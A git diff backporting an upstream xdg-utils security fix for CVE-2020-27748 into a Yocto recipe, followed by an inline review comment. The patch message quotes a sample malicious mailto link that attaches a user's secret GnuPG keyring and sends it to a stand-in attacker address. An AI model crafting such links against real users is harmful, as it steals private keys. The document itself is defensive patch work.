Diffstat (limited to 'meta')
-rw-r--r-- | meta/recipes-extended/xdg-utils/xdg-utils/1f199813e0eb0246f63b54e9e154970e609575af.patch | 58 | ||||
-rw-r--r-- | meta/recipes-extended/xdg-utils/xdg-utils_1.1.3.bb | 1 |
2 files changed, 59 insertions, 0 deletions
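--- /dev/null
+++ b/meta/recipes-extended/xdg-utils/xdg-utils/1f199813e0eb0246f63b54e9e154970e609575af.patch
@@ -0,0 +1,58 @@
+From 1f199813e0eb0246f63b54e9e154970e609575af Mon Sep 17 00:00:00 2001
+From: =?UTF-8?q?J=C3=B6rg=20Thalheim?= <joerg@thalheim.io>
+Date: Tue, 18 Aug 2020 16:52:24 +0100
+Subject: [PATCH] xdg-email: remove attachment handling from mailto
+MIME-Version: 1.0
+Content-Type: text/plain; charset=UTF-8
+Content-Transfer-Encoding: 8bit
+
+This allows attacker to extract secrets from users:
+
+mailto:sid@evil.com?attach=/.gnupg/secring.gpg
+
+See also https://bugzilla.mozilla.org/show_bug.cgi?id=1613425
+and https://gitlab.freedesktop.org/xdg/xdg-utils/-/issues/177
+
+Signed-off-by: Jörg Thalheim <joerg@thalheim.io>
+---
+scripts/xdg-email.in | 7 +------
+1 file changed, 1 insertion(+), 6 deletions(-)
+
+Upstream-Status: Backport
+CVE: CVE-2020-27748
+
+diff --git a/scripts/xdg-email.in b/scripts/xdg-email.in
+index 6db58ad..5d2f4f3 100644
+--- a/scripts/xdg-email.in
++++ b/scripts/xdg-email.in
+@@ -32,7 +32,7 @@ _USAGE
+
+run_thunderbird()
+{
+- local THUNDERBIRD MAILTO NEWMAILTO TO CC BCC SUBJECT BODY ATTACH
++ local THUNDERBIRD MAILTO NEWMAILTO TO CC BCC SUBJECT BODY
+THUNDERBIRD="$1"
+MAILTO=$(echo "$2" | sed 's/^mailto://')
+echo "$MAILTO" | grep -qs "^?"
+@@ -48,7 +48,6 @@ run_thunderbird()
+BCC=$(/bin/echo -e $(echo "$MAILTO" | grep '^bcc=' | sed 's/^bcc=//;s/%\(..\)/\\x\1/g' | awk '{ printf "%s,",$0 }'))
+SUBJECT=$(echo "$MAILTO" | grep '^subject=' | tail -n 1)
+BODY=$(echo "$MAILTO" | grep '^body=' | tail -n 1)
+- ATTACH=$(/bin/echo -e $(echo "$MAILTO" | grep '^attach=' | sed 's/^attach=//;s/%\(..\)/\\x\1/g' | awk '{ printf "%s,",$0 }' | sed 's/,$//'))
+
+if [ -z "$TO" ] ; then
+NEWMAILTO=
+@@ -68,10 +67,6 @@ run_thunderbird()
+NEWMAILTO="${NEWMAILTO},$BODY"
+fi
+
+- if [ -n "$ATTACH" ] ; then
+- NEWMAILTO="${NEWMAILTO},attachment='${ATTACH}'"
+- fi
+-
+NEWMAILTO=$(echo "$NEWMAILTO" | sed 's/^,//')
+DEBUG 1 "Running $THUNDERBIRD -compose \"$NEWMAILTO\""
+"$THUNDERBIRD" -compose "$NEWMAILTO"
+--
+GitLab
+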
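Review bot: Nothing in this backport shows whether the other mail-client paths in xdg-email.in still forward an `attach=` parameter taken from a mailto: URI. All three hunks sit inside run_thunderbird(), whose body starts and ends outside them, so check the full script before treating CVE-2020-27748 as closed for this recipe. The BCC line kept as context still feeds percent-decoded URI data through an unquoted `$(...)` into `/bin/echo -e`, the same pattern the removed ATTACH line used, so it may be subject to word splitting and globbing and is worth raising upstream. For auditability, move the tags above the `---` separator as `Upstream-Status: Backport [<upstream commit URL>]` and `CVE: CVE-2020-27748`, and add the backporter's own Signed-off-by. Naming the file after the CVE rather than the commit hash would also make the fix easier to find from the SRC_URI entry in xdg-utils_1.1.3.bb.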
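--- a/meta/recipes-extended/xdg-utils/xdg-utils_1.1.3.bb
+++ b/meta/recipes-extended/xdg-utils/xdg-utils_1.1.3.bb
@@ -20,6 +20,7 @@ LIC_FILES_CHKSUM = "file://LICENSE;md5=a5367a90934098d6b05af3b746405014"
 SRC_URI = "https://portland.freedesktop.org/download/${BPN}-${PV}.tar.gz \
 file://0001-Reinstate-xdg-terminal.patch \
 file://0001-Don-t-build-the-in-script-manual.patch \
+file://1f199813e0eb0246f63b54e9e154970e609575af.patch \
 "
 
 SRC_URI[md5sum] = "902042508b626027a3709d105f0b63ff"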